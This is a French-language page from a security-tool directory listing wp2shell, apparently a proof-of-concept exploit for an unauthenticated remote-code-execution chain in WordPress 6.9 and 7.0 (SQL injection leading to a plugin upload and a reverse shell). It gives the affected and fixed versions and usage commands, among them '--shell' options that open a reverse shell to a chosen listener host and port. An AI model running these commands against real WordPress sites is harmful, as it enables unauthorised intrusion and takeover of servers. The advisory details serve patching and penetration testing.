Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-63030 — Exploit POC de la RCE non authentifiée du noyau WordPress connu sous le nom de WP2Shell | Kitploit
Outils/GitHubGitHub/mverschu/cve-2026-63030
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubmverschu/cve-2026-63030

CVE-2026-63030

Exploit POC de la RCE non authentifiée du noyau WordPress connu sous le nom de WP2Shell

Voir le dépôt
41il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Nomwp2shell
CVEsCVE-2026-63030 (désynchronisation de lot), CVE-2026-60137 (author__not_in injection SQL)
AffectéWordPress 6.9.0 à 6.9.4, 7.0.0 à 7.0.1
Corrigé dans6.9.5, 7.0.2
Authentification nécessaireAucune
Découvert parAdam Kues (Searchlight Cyber / Assetnote)

Utilisation

Hôte nu = schéma automatique (essaie https:// puis http://). Préfixez avec http:// ou https:// uniquement si vous voulez en forcer un.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
Télécharger l’outil
FlagCe qu'il fait
--shell [LHOST [LPORT]]chaîne RCE standard ; LHOST par défaut est l'IP de cette machine, LPORT est 443
--rest-routeessayez /?rest_route=/batch/v1 d'abord
--verify-tlsvérifier les certificats TLS (désactivé par défaut pour les labos/auto-signés)
--proxy URLenvoyer le trafic via un proxy
--forceignorer l'empreinte WordPress